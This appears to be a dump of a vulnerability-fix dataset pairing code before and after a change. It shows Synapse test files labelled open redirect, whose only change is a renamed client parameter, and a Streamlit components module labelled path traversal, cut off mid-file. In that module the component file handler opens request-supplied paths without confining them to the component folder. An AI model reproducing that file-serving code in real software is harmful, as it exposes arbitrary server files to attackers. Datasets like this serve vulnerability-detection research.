label
class label 6
classes | code_before
stringlengths 75
187k
| code_after
stringlengths 75
187k
| label_text
stringclasses 6
values | deleted
dict | added
dict | normalized_code_before
stringlengths 75
152k
| normalized_code_after
stringlengths 75
152k
| before_doc_string_pos
sequence | after_doc_string_pos
sequence |
---|---|---|---|---|---|---|---|---|---|
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2019 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mock import Mock, patch
from parameterized import parameterized
from synapse.app.generic_worker import GenericWorkerServer
from synapse.app.homeserver import SynapseHomeServer
from synapse.config.server import parse_listener_def
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class FederationReaderOpenIDListenerTests(HomeserverTestCase):
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
http_client=None, homeserver_to_use=GenericWorkerServer
)
return hs
def default_config(self):
conf = super().default_config()
# we're using FederationReaderServer, which uses a SlavedStore, so we
# have to tell the FederationHandler not to try to access stuff that is only
# in the primary store.
conf["worker_app"] = "yes"
return conf
@parameterized.expand(
[
(["federation"], "auth_fail"),
([], "no_resource"),
(["openid", "federation"], "auth_fail"),
(["openid"], "auth_fail"),
]
)
def test_openid_listener(self, names, expectation):
"""
Test different openid listener configurations.
401 is success here since it means we hit the handler and auth failed.
"""
config = {
"port": 8080,
"type": "http",
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": names}],
}
# Listen with the config
self.hs._listen_http(parse_listener_def(config))
# Grab the resource from the site that was told to listen
site = self.reactor.tcpServers[0][1]
try:
site.resource.children[b"_matrix"].children[b"federation"]
except KeyError:
if expectation == "no_resource":
return
raise
_, channel = make_request(
self.reactor, site, "GET", "/_matrix/federation/v1/openid/userinfo"
)
self.assertEqual(channel.code, 401)
@patch("synapse.app.homeserver.KeyApiV2Resource", new=Mock())
class SynapseHomeserverOpenIDListenerTests(HomeserverTestCase):
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
http_client=None, homeserver_to_use=SynapseHomeServer
)
return hs
@parameterized.expand(
[
(["federation"], "auth_fail"),
([], "no_resource"),
(["openid", "federation"], "auth_fail"),
(["openid"], "auth_fail"),
]
)
def test_openid_listener(self, names, expectation):
"""
Test different openid listener configurations.
401 is success here since it means we hit the handler and auth failed.
"""
config = {
"port": 8080,
"type": "http",
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": names}],
}
# Listen with the config
self.hs._listener_http(self.hs.get_config(), parse_listener_def(config))
# Grab the resource from the site that was told to listen
site = self.reactor.tcpServers[0][1]
try:
site.resource.children[b"_matrix"].children[b"federation"]
except KeyError:
if expectation == "no_resource":
return
raise
_, channel = make_request(
self.reactor, site, "GET", "/_matrix/federation/v1/openid/userinfo"
)
self.assertEqual(channel.code, 401)
| # -*- coding: utf-8 -*-
# Copyright 2019 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mock import Mock, patch
from parameterized import parameterized
from synapse.app.generic_worker import GenericWorkerServer
from synapse.app.homeserver import SynapseHomeServer
from synapse.config.server import parse_listener_def
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class FederationReaderOpenIDListenerTests(HomeserverTestCase):
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
federation_http_client=None, homeserver_to_use=GenericWorkerServer
)
return hs
def default_config(self):
conf = super().default_config()
# we're using FederationReaderServer, which uses a SlavedStore, so we
# have to tell the FederationHandler not to try to access stuff that is only
# in the primary store.
conf["worker_app"] = "yes"
return conf
@parameterized.expand(
[
(["federation"], "auth_fail"),
([], "no_resource"),
(["openid", "federation"], "auth_fail"),
(["openid"], "auth_fail"),
]
)
def test_openid_listener(self, names, expectation):
"""
Test different openid listener configurations.
401 is success here since it means we hit the handler and auth failed.
"""
config = {
"port": 8080,
"type": "http",
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": names}],
}
# Listen with the config
self.hs._listen_http(parse_listener_def(config))
# Grab the resource from the site that was told to listen
site = self.reactor.tcpServers[0][1]
try:
site.resource.children[b"_matrix"].children[b"federation"]
except KeyError:
if expectation == "no_resource":
return
raise
_, channel = make_request(
self.reactor, site, "GET", "/_matrix/federation/v1/openid/userinfo"
)
self.assertEqual(channel.code, 401)
@patch("synapse.app.homeserver.KeyApiV2Resource", new=Mock())
class SynapseHomeserverOpenIDListenerTests(HomeserverTestCase):
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
federation_http_client=None, homeserver_to_use=SynapseHomeServer
)
return hs
@parameterized.expand(
[
(["federation"], "auth_fail"),
([], "no_resource"),
(["openid", "federation"], "auth_fail"),
(["openid"], "auth_fail"),
]
)
def test_openid_listener(self, names, expectation):
"""
Test different openid listener configurations.
401 is success here since it means we hit the handler and auth failed.
"""
config = {
"port": 8080,
"type": "http",
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": names}],
}
# Listen with the config
self.hs._listener_http(self.hs.get_config(), parse_listener_def(config))
# Grab the resource from the site that was told to listen
site = self.reactor.tcpServers[0][1]
try:
site.resource.children[b"_matrix"].children[b"federation"]
except KeyError:
if expectation == "no_resource":
return
raise
_, channel = make_request(
self.reactor, site, "GET", "/_matrix/federation/v1/openid/userinfo"
)
self.assertEqual(channel.code, 401)
| open_redirect | {
"code": [
" http_client=None, homeserver_to_use=GenericWorkerServer",
" http_client=None, homeserver_to_use=SynapseHomeServer"
],
"line_no": [
30,
87
]
} | {
"code": [
" federation_http_client=None, homeserver_to_use=GenericWorkerServer",
" federation_http_client=None, homeserver_to_use=SynapseHomeServer"
],
"line_no": [
30,
87
]
} |
from mock import Mock, patch
from parameterized import parameterized
from synapse.app.generic_worker import GenericWorkerServer
from synapse.app.homeserver import SynapseHomeServer
from synapse.config.server import parse_listener_def
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class CLASS_0(HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
VAR_4 = self.setup_test_homeserver(
http_client=None, homeserver_to_use=GenericWorkerServer
)
return VAR_4
def FUNC_1(self):
VAR_5 = super().default_config()
VAR_5["worker_app"] = "yes"
return VAR_5
@parameterized.expand(
[
(["federation"], "auth_fail"),
([], "no_resource"),
(["openid", "federation"], "auth_fail"),
(["openid"], "auth_fail"),
]
)
def FUNC_2(self, VAR_2, VAR_3):
VAR_6 = {
"port": 8080,
"type": "http",
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": VAR_2}],
}
self.hs._listen_http(parse_listener_def(VAR_6))
VAR_7 = self.reactor.tcpServers[0][1]
try:
VAR_7.resource.children[b"_matrix"].children[b"federation"]
except KeyError:
if VAR_3 == "no_resource":
return
raise
VAR_8, VAR_9 = make_request(
self.reactor, VAR_7, "GET", "/_matrix/federation/v1/openid/userinfo"
)
self.assertEqual(VAR_9.code, 401)
@patch("synapse.app.homeserver.KeyApiV2Resource", new=Mock())
class CLASS_1(HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
VAR_4 = self.setup_test_homeserver(
http_client=None, homeserver_to_use=SynapseHomeServer
)
return VAR_4
@parameterized.expand(
[
(["federation"], "auth_fail"),
([], "no_resource"),
(["openid", "federation"], "auth_fail"),
(["openid"], "auth_fail"),
]
)
def FUNC_2(self, VAR_2, VAR_3):
VAR_6 = {
"port": 8080,
"type": "http",
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": VAR_2}],
}
self.hs._listener_http(self.hs.get_config(), parse_listener_def(VAR_6))
VAR_7 = self.reactor.tcpServers[0][1]
try:
VAR_7.resource.children[b"_matrix"].children[b"federation"]
except KeyError:
if VAR_3 == "no_resource":
return
raise
VAR_8, VAR_9 = make_request(
self.reactor, VAR_7, "GET", "/_matrix/federation/v1/openid/userinfo"
)
self.assertEqual(VAR_9.code, 401)
|
from mock import Mock, patch
from parameterized import parameterized
from synapse.app.generic_worker import GenericWorkerServer
from synapse.app.homeserver import SynapseHomeServer
from synapse.config.server import parse_listener_def
from tests.server import make_request
from tests.unittest import HomeserverTestCase
class CLASS_0(HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
VAR_4 = self.setup_test_homeserver(
federation_http_client=None, homeserver_to_use=GenericWorkerServer
)
return VAR_4
def FUNC_1(self):
VAR_5 = super().default_config()
VAR_5["worker_app"] = "yes"
return VAR_5
@parameterized.expand(
[
(["federation"], "auth_fail"),
([], "no_resource"),
(["openid", "federation"], "auth_fail"),
(["openid"], "auth_fail"),
]
)
def FUNC_2(self, VAR_2, VAR_3):
VAR_6 = {
"port": 8080,
"type": "http",
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": VAR_2}],
}
self.hs._listen_http(parse_listener_def(VAR_6))
VAR_7 = self.reactor.tcpServers[0][1]
try:
VAR_7.resource.children[b"_matrix"].children[b"federation"]
except KeyError:
if VAR_3 == "no_resource":
return
raise
VAR_8, VAR_9 = make_request(
self.reactor, VAR_7, "GET", "/_matrix/federation/v1/openid/userinfo"
)
self.assertEqual(VAR_9.code, 401)
@patch("synapse.app.homeserver.KeyApiV2Resource", new=Mock())
class CLASS_1(HomeserverTestCase):
def FUNC_0(self, VAR_0, VAR_1):
VAR_4 = self.setup_test_homeserver(
federation_http_client=None, homeserver_to_use=SynapseHomeServer
)
return VAR_4
@parameterized.expand(
[
(["federation"], "auth_fail"),
([], "no_resource"),
(["openid", "federation"], "auth_fail"),
(["openid"], "auth_fail"),
]
)
def FUNC_2(self, VAR_2, VAR_3):
VAR_6 = {
"port": 8080,
"type": "http",
"bind_addresses": ["0.0.0.0"],
"resources": [{"names": VAR_2}],
}
self.hs._listener_http(self.hs.get_config(), parse_listener_def(VAR_6))
VAR_7 = self.reactor.tcpServers[0][1]
try:
VAR_7.resource.children[b"_matrix"].children[b"federation"]
except KeyError:
if VAR_3 == "no_resource":
return
raise
VAR_8, VAR_9 = make_request(
self.reactor, VAR_7, "GET", "/_matrix/federation/v1/openid/userinfo"
)
self.assertEqual(VAR_9.code, 401)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
16,
18,
22,
25,
26,
33,
36,
37,
38,
40,
42,
54,
63,
64,
66,
67,
75,
79,
81,
82,
90,
102,
111,
112,
114,
115,
123,
127,
129,
52,
53,
54,
55,
56,
100,
101,
102,
103,
104
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
16,
18,
22,
25,
26,
33,
36,
37,
38,
40,
42,
54,
63,
64,
66,
67,
75,
79,
81,
82,
90,
102,
111,
112,
114,
115,
123,
127,
129,
52,
53,
54,
55,
56,
100,
101,
102,
103,
104
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import defer
from synapse.api.errors import NotFoundError
from synapse.rest.client.v1 import room
from tests.unittest import HomeserverTestCase
class PurgeTests(HomeserverTestCase):
user_id = "@red:server"
servlets = [room.register_servlets]
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver("server", http_client=None)
return hs
def prepare(self, reactor, clock, hs):
self.room_id = self.helper.create_room_as(self.user_id)
def test_purge(self):
"""
Purging a room will delete everything before the topological point.
"""
# Send four messages to the room
first = self.helper.send(self.room_id, body="test1")
second = self.helper.send(self.room_id, body="test2")
third = self.helper.send(self.room_id, body="test3")
last = self.helper.send(self.room_id, body="test4")
store = self.hs.get_datastore()
storage = self.hs.get_storage()
# Get the topological token
token = self.get_success(
store.get_topological_token_for_event(last["event_id"])
)
token_str = self.get_success(token.to_string(self.hs.get_datastore()))
# Purge everything before this topological token
self.get_success(
storage.purge_events.purge_history(self.room_id, token_str, True)
)
# 1-3 should fail and last will succeed, meaning that 1-3 are deleted
# and last is not.
self.get_failure(store.get_event(first["event_id"]), NotFoundError)
self.get_failure(store.get_event(second["event_id"]), NotFoundError)
self.get_failure(store.get_event(third["event_id"]), NotFoundError)
self.get_success(store.get_event(last["event_id"]))
def test_purge_wont_delete_extrems(self):
"""
Purging a room will delete everything before the topological point.
"""
# Send four messages to the room
first = self.helper.send(self.room_id, body="test1")
second = self.helper.send(self.room_id, body="test2")
third = self.helper.send(self.room_id, body="test3")
last = self.helper.send(self.room_id, body="test4")
storage = self.hs.get_datastore()
# Set the topological token higher than it should be
token = self.get_success(
storage.get_topological_token_for_event(last["event_id"])
)
event = "t{}-{}".format(token.topological + 1, token.stream + 1)
# Purge everything before this topological token
purge = defer.ensureDeferred(storage.purge_history(self.room_id, event, True))
self.pump()
f = self.failureResultOf(purge)
self.assertIn("greater than forward", f.value.args[0])
# Try and get the events
self.get_success(storage.get_event(first["event_id"]))
self.get_success(storage.get_event(second["event_id"]))
self.get_success(storage.get_event(third["event_id"]))
self.get_success(storage.get_event(last["event_id"]))
| # -*- coding: utf-8 -*-
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import defer
from synapse.api.errors import NotFoundError
from synapse.rest.client.v1 import room
from tests.unittest import HomeserverTestCase
class PurgeTests(HomeserverTestCase):
user_id = "@red:server"
servlets = [room.register_servlets]
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver("server", federation_http_client=None)
return hs
def prepare(self, reactor, clock, hs):
self.room_id = self.helper.create_room_as(self.user_id)
def test_purge(self):
"""
Purging a room will delete everything before the topological point.
"""
# Send four messages to the room
first = self.helper.send(self.room_id, body="test1")
second = self.helper.send(self.room_id, body="test2")
third = self.helper.send(self.room_id, body="test3")
last = self.helper.send(self.room_id, body="test4")
store = self.hs.get_datastore()
storage = self.hs.get_storage()
# Get the topological token
token = self.get_success(
store.get_topological_token_for_event(last["event_id"])
)
token_str = self.get_success(token.to_string(self.hs.get_datastore()))
# Purge everything before this topological token
self.get_success(
storage.purge_events.purge_history(self.room_id, token_str, True)
)
# 1-3 should fail and last will succeed, meaning that 1-3 are deleted
# and last is not.
self.get_failure(store.get_event(first["event_id"]), NotFoundError)
self.get_failure(store.get_event(second["event_id"]), NotFoundError)
self.get_failure(store.get_event(third["event_id"]), NotFoundError)
self.get_success(store.get_event(last["event_id"]))
def test_purge_wont_delete_extrems(self):
"""
Purging a room will delete everything before the topological point.
"""
# Send four messages to the room
first = self.helper.send(self.room_id, body="test1")
second = self.helper.send(self.room_id, body="test2")
third = self.helper.send(self.room_id, body="test3")
last = self.helper.send(self.room_id, body="test4")
storage = self.hs.get_datastore()
# Set the topological token higher than it should be
token = self.get_success(
storage.get_topological_token_for_event(last["event_id"])
)
event = "t{}-{}".format(token.topological + 1, token.stream + 1)
# Purge everything before this topological token
purge = defer.ensureDeferred(storage.purge_history(self.room_id, event, True))
self.pump()
f = self.failureResultOf(purge)
self.assertIn("greater than forward", f.value.args[0])
# Try and get the events
self.get_success(storage.get_event(first["event_id"]))
self.get_success(storage.get_event(second["event_id"]))
self.get_success(storage.get_event(third["event_id"]))
self.get_success(storage.get_event(last["event_id"]))
| open_redirect | {
"code": [
" hs = self.setup_test_homeserver(\"server\", http_client=None)"
],
"line_no": [
30
]
} | {
"code": [
" hs = self.setup_test_homeserver(\"server\", federation_http_client=None)"
],
"line_no": [
30
]
} |
from twisted.internet import defer
from synapse.api.errors import NotFoundError
from synapse.rest.client.v1 import room
from tests.unittest import HomeserverTestCase
class CLASS_0(HomeserverTestCase):
VAR_0 = "@red:server"
VAR_1 = [room.register_servlets]
def FUNC_0(self, VAR_2, VAR_3):
VAR_4 = self.setup_test_homeserver("server", http_client=None)
return VAR_4
def FUNC_1(self, VAR_2, VAR_3, VAR_4):
self.room_id = self.helper.create_room_as(self.user_id)
def FUNC_2(self):
VAR_5 = self.helper.send(self.room_id, body="test1")
VAR_6 = self.helper.send(self.room_id, body="test2")
VAR_7 = self.helper.send(self.room_id, body="test3")
VAR_8 = self.helper.send(self.room_id, body="test4")
VAR_9 = self.hs.get_datastore()
VAR_10 = self.hs.get_storage()
VAR_11 = self.get_success(
VAR_9.get_topological_token_for_event(VAR_8["event_id"])
)
VAR_12 = self.get_success(VAR_11.to_string(self.hs.get_datastore()))
self.get_success(
VAR_10.purge_events.purge_history(self.room_id, VAR_12, True)
)
self.get_failure(VAR_9.get_event(VAR_5["event_id"]), NotFoundError)
self.get_failure(VAR_9.get_event(VAR_6["event_id"]), NotFoundError)
self.get_failure(VAR_9.get_event(VAR_7["event_id"]), NotFoundError)
self.get_success(VAR_9.get_event(VAR_8["event_id"]))
def FUNC_3(self):
VAR_5 = self.helper.send(self.room_id, body="test1")
VAR_6 = self.helper.send(self.room_id, body="test2")
VAR_7 = self.helper.send(self.room_id, body="test3")
VAR_8 = self.helper.send(self.room_id, body="test4")
VAR_10 = self.hs.get_datastore()
VAR_11 = self.get_success(
VAR_10.get_topological_token_for_event(VAR_8["event_id"])
)
VAR_13 = "t{}-{}".format(VAR_11.topological + 1, VAR_11.stream + 1)
VAR_14 = defer.ensureDeferred(VAR_10.purge_history(self.room_id, VAR_13, True))
self.pump()
VAR_15 = self.failureResultOf(VAR_14)
self.assertIn("greater than forward", VAR_15.value.args[0])
self.get_success(VAR_10.get_event(VAR_5["event_id"]))
self.get_success(VAR_10.get_event(VAR_6["event_id"]))
self.get_success(VAR_10.get_event(VAR_7["event_id"]))
self.get_success(VAR_10.get_event(VAR_8["event_id"]))
|
from twisted.internet import defer
from synapse.api.errors import NotFoundError
from synapse.rest.client.v1 import room
from tests.unittest import HomeserverTestCase
class CLASS_0(HomeserverTestCase):
VAR_0 = "@red:server"
VAR_1 = [room.register_servlets]
def FUNC_0(self, VAR_2, VAR_3):
VAR_4 = self.setup_test_homeserver("server", federation_http_client=None)
return VAR_4
def FUNC_1(self, VAR_2, VAR_3, VAR_4):
self.room_id = self.helper.create_room_as(self.user_id)
def FUNC_2(self):
VAR_5 = self.helper.send(self.room_id, body="test1")
VAR_6 = self.helper.send(self.room_id, body="test2")
VAR_7 = self.helper.send(self.room_id, body="test3")
VAR_8 = self.helper.send(self.room_id, body="test4")
VAR_9 = self.hs.get_datastore()
VAR_10 = self.hs.get_storage()
VAR_11 = self.get_success(
VAR_9.get_topological_token_for_event(VAR_8["event_id"])
)
VAR_12 = self.get_success(VAR_11.to_string(self.hs.get_datastore()))
self.get_success(
VAR_10.purge_events.purge_history(self.room_id, VAR_12, True)
)
self.get_failure(VAR_9.get_event(VAR_5["event_id"]), NotFoundError)
self.get_failure(VAR_9.get_event(VAR_6["event_id"]), NotFoundError)
self.get_failure(VAR_9.get_event(VAR_7["event_id"]), NotFoundError)
self.get_success(VAR_9.get_event(VAR_8["event_id"]))
def FUNC_3(self):
VAR_5 = self.helper.send(self.room_id, body="test1")
VAR_6 = self.helper.send(self.room_id, body="test2")
VAR_7 = self.helper.send(self.room_id, body="test3")
VAR_8 = self.helper.send(self.room_id, body="test4")
VAR_10 = self.hs.get_datastore()
VAR_11 = self.get_success(
VAR_10.get_topological_token_for_event(VAR_8["event_id"])
)
VAR_13 = "t{}-{}".format(VAR_11.topological + 1, VAR_11.stream + 1)
VAR_14 = defer.ensureDeferred(VAR_10.purge_history(self.room_id, VAR_13, True))
self.pump()
VAR_15 = self.failureResultOf(VAR_14)
self.assertIn("greater than forward", VAR_15.value.args[0])
self.get_success(VAR_10.get_event(VAR_5["event_id"]))
self.get_success(VAR_10.get_event(VAR_6["event_id"]))
self.get_success(VAR_10.get_event(VAR_7["event_id"]))
self.get_success(VAR_10.get_event(VAR_8["event_id"]))
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
17,
20,
22,
23,
25,
28,
32,
35,
40,
45,
48,
49,
54,
55,
59,
60,
61,
66,
71,
76,
78,
79,
84,
85,
90,
91,
96,
37,
38,
39,
68,
69,
70
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
17,
20,
22,
23,
25,
28,
32,
35,
40,
45,
48,
49,
54,
55,
59,
60,
61,
66,
71,
76,
78,
79,
84,
85,
90,
91,
96,
37,
38,
39,
68,
69,
70
] |
0CWE-22
| # Copyright 2018-2022 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
import mimetypes
import os
import threading
from typing import Any, Dict, Optional, Type, Union
import tornado.web
from streamlit.scriptrunner import get_script_run_ctx
import streamlit.server.routes
from streamlit import type_util
from streamlit.elements.form import current_form_id
from streamlit import util
from streamlit.errors import StreamlitAPIException
from streamlit.logger import get_logger
from streamlit.proto.Components_pb2 import SpecialArg, ArrowTable as ArrowTableProto
from streamlit.proto.Element_pb2 import Element
from streamlit.state import NoValue, register_widget
from streamlit.type_util import to_bytes
LOGGER = get_logger(__name__)
class MarshallComponentException(StreamlitAPIException):
"""Class for exceptions generated during custom component marshalling."""
pass
class CustomComponent:
"""A Custom Component declaration."""
def __init__(
self,
name: str,
path: Optional[str] = None,
url: Optional[str] = None,
):
if (path is None and url is None) or (path is not None and url is not None):
raise StreamlitAPIException(
"Either 'path' or 'url' must be set, but not both."
)
self.name = name
self.path = path
self.url = url
def __repr__(self) -> str:
return util.repr_(self)
@property
def abspath(self) -> Optional[str]:
"""The absolute path that the component is served from."""
if self.path is None:
return None
return os.path.abspath(self.path)
def __call__(
self,
*args,
default: Any = None,
key: Optional[str] = None,
**kwargs,
) -> Any:
"""An alias for create_instance."""
return self.create_instance(*args, default=default, key=key, **kwargs)
def create_instance(
self,
*args,
default: Any = None,
key: Optional[str] = None,
**kwargs,
) -> Any:
"""Create a new instance of the component.
Parameters
----------
*args
Must be empty; all args must be named. (This parameter exists to
enforce correct use of the function.)
default: any or None
The default return value for the component. This is returned when
the component's frontend hasn't yet specified a value with
`setComponentValue`.
key: str or None
If not None, this is the user key we use to generate the
component's "widget ID".
**kwargs
Keyword args to pass to the component.
Returns
-------
any or None
The component's widget value.
"""
if len(args) > 0:
raise MarshallComponentException(f"Argument '{args[0]}' needs a label")
try:
import pyarrow
from streamlit.components.v1 import component_arrow
except ImportError:
raise StreamlitAPIException(
"""To use Custom Components in Streamlit, you need to install
PyArrow. To do so locally:
`pip install pyarrow`
And if you're using Streamlit Cloud, add "pyarrow" to your requirements.txt."""
)
# In addition to the custom kwargs passed to the component, we also
# send the special 'default' and 'key' params to the component
# frontend.
all_args = dict(kwargs, **{"default": default, "key": key})
json_args = {}
special_args = []
for arg_name, arg_val in all_args.items():
if type_util.is_bytes_like(arg_val):
bytes_arg = SpecialArg()
bytes_arg.key = arg_name
bytes_arg.bytes = to_bytes(arg_val)
special_args.append(bytes_arg)
elif type_util.is_dataframe_like(arg_val):
dataframe_arg = SpecialArg()
dataframe_arg.key = arg_name
component_arrow.marshall(dataframe_arg.arrow_dataframe.data, arg_val)
special_args.append(dataframe_arg)
else:
json_args[arg_name] = arg_val
try:
serialized_json_args = json.dumps(json_args)
except BaseException as e:
raise MarshallComponentException(
"Could not convert component args to JSON", e
)
def marshall_component(dg, element: Element) -> Union[Any, Type[NoValue]]:
element.component_instance.component_name = self.name
element.component_instance.form_id = current_form_id(dg)
if self.url is not None:
element.component_instance.url = self.url
# Normally, a widget's element_hash (which determines
# its identity across multiple runs of an app) is computed
# by hashing the entirety of its protobuf. This means that,
# if any of the arguments to the widget are changed, Streamlit
# considers it a new widget instance and it loses its previous
# state.
#
# However! If a *component* has a `key` argument, then the
# component's hash identity is determined by entirely by
# `component_name + url + key`. This means that, when `key`
# exists, the component will maintain its identity even when its
# other arguments change, and the component's iframe won't be
# remounted on the frontend.
#
# So: if `key` is None, we marshall the element's arguments
# *before* computing its widget_ui_value (which creates its hash).
# If `key` is not None, we marshall the arguments *after*.
def marshall_element_args():
element.component_instance.json_args = serialized_json_args
element.component_instance.special_args.extend(special_args)
if key is None:
marshall_element_args()
def deserialize_component(ui_value, widget_id=""):
# ui_value is an object from json, an ArrowTable proto, or a bytearray
return ui_value
ctx = get_script_run_ctx()
component_state = register_widget(
element_type="component_instance",
element_proto=element.component_instance,
user_key=key,
widget_func_name=self.name,
deserializer=deserialize_component,
serializer=lambda x: x,
ctx=ctx,
)
widget_value = component_state.value
if key is not None:
marshall_element_args()
if widget_value is None:
widget_value = default
elif isinstance(widget_value, ArrowTableProto):
widget_value = component_arrow.arrow_proto_to_dataframe(widget_value)
# widget_value will be either None or whatever the component's most
# recent setWidgetValue value is. We coerce None -> NoValue,
# because that's what DeltaGenerator._enqueue expects.
return widget_value if widget_value is not None else NoValue
# We currently only support writing to st._main, but this will change
# when we settle on an improved API in a post-layout world.
dg = streamlit._main
element = Element()
return_value = marshall_component(dg, element)
result = dg._enqueue(
"component_instance", element.component_instance, return_value
)
return result
def __eq__(self, other) -> bool:
"""Equality operator."""
return (
isinstance(other, CustomComponent)
and self.name == other.name
and self.path == other.path
and self.url == other.url
)
def __ne__(self, other) -> bool:
"""Inequality operator."""
return not self == other
def __str__(self) -> str:
return f"'{self.name}': {self.path if self.path is not None else self.url}"
def declare_component(
name: str,
path: Optional[str] = None,
url: Optional[str] = None,
) -> CustomComponent:
"""Create and register a custom component.
Parameters
----------
name: str
A short, descriptive name for the component. Like, "slider".
path: str or None
The path to serve the component's frontend files from. Either
`path` or `url` must be specified, but not both.
url: str or None
The URL that the component is served from. Either `path` or `url`
must be specified, but not both.
Returns
-------
CustomComponent
A CustomComponent that can be called like a function.
Calling the component will create a new instance of the component
in the Streamlit app.
"""
# Get our stack frame.
current_frame = inspect.currentframe()
assert current_frame is not None
# Get the stack frame of our calling function.
caller_frame = current_frame.f_back
assert caller_frame is not None
# Get the caller's module name. `__name__` gives us the module's
# fully-qualified name, which includes its package.
module = inspect.getmodule(caller_frame)
assert module is not None
module_name = module.__name__
# If the caller was the main module that was executed (that is, if the
# user executed `python my_component.py`), then this name will be
# "__main__" instead of the actual package name. In this case, we use
# the main module's filename, sans `.py` extension, as the component name.
if module_name == "__main__":
file_path = inspect.getfile(caller_frame)
filename = os.path.basename(file_path)
module_name, _ = os.path.splitext(filename)
# Build the component name.
component_name = f"{module_name}.{name}"
# Create our component object, and register it.
component = CustomComponent(name=component_name, path=path, url=url)
ComponentRegistry.instance().register_component(component)
return component
class ComponentRequestHandler(tornado.web.RequestHandler):
def initialize(self, registry: "ComponentRegistry"):
self._registry = registry
def get(self, path: str) -> None:
parts = path.split("/")
component_name = parts[0]
component_root = self._registry.get_component_path(component_name)
if component_root is None:
self.write("not found")
self.set_status(404)
return
filename = "/".join(parts[1:])
abspath = os.path.join(component_root, filename)
LOGGER.debug("ComponentRequestHandler: GET: %s -> %s", path, abspath)
try:
with open(abspath, "rb") as file:
contents = file.read()
except (OSError) as e:
LOGGER.error(f"ComponentRequestHandler: GET {path} read error", exc_info=e)
self.write("read error")
self.set_status(404)
return
self.write(contents)
self.set_header("Content-Type", self.get_content_type(abspath))
self.set_extra_headers(path)
def set_extra_headers(self, path) -> None:
"""Disable cache for HTML files.
Other assets like JS and CSS are suffixed with their hash, so they can
be cached indefinitely.
"""
is_index_url = len(path) == 0
if is_index_url or path.endswith(".html"):
self.set_header("Cache-Control", "no-cache")
else:
self.set_header("Cache-Control", "public")
def set_default_headers(self) -> None:
if streamlit.server.routes.allow_cross_origin_requests():
self.set_header("Access-Control-Allow-Origin", "*")
def options(self) -> None:
"""/OPTIONS handler for preflight CORS checks."""
self.set_status(204)
self.finish()
@staticmethod
def get_content_type(abspath) -> str:
"""Returns the ``Content-Type`` header to be used for this request.
From tornado.web.StaticFileHandler.
"""
mime_type, encoding = mimetypes.guess_type(abspath)
# per RFC 6713, use the appropriate type for a gzip compressed file
if encoding == "gzip":
return "application/gzip"
# As of 2015-07-21 there is no bzip2 encoding defined at
# http://www.iana.org/assignments/media-types/media-types.xhtml
# So for that (and any other encoding), use octet-stream.
elif encoding is not None:
return "application/octet-stream"
elif mime_type is not None:
return mime_type
# if mime_type not detected, use application/octet-stream
else:
return "application/octet-stream"
@staticmethod
def get_url(file_id: str) -> str:
"""Return the URL for a component file with the given ID."""
return "components/{}".format(file_id)
class ComponentRegistry:
_instance_lock: threading.Lock = threading.Lock()
_instance: Optional["ComponentRegistry"] = None
@classmethod
def instance(cls) -> "ComponentRegistry":
"""Returns the singleton ComponentRegistry"""
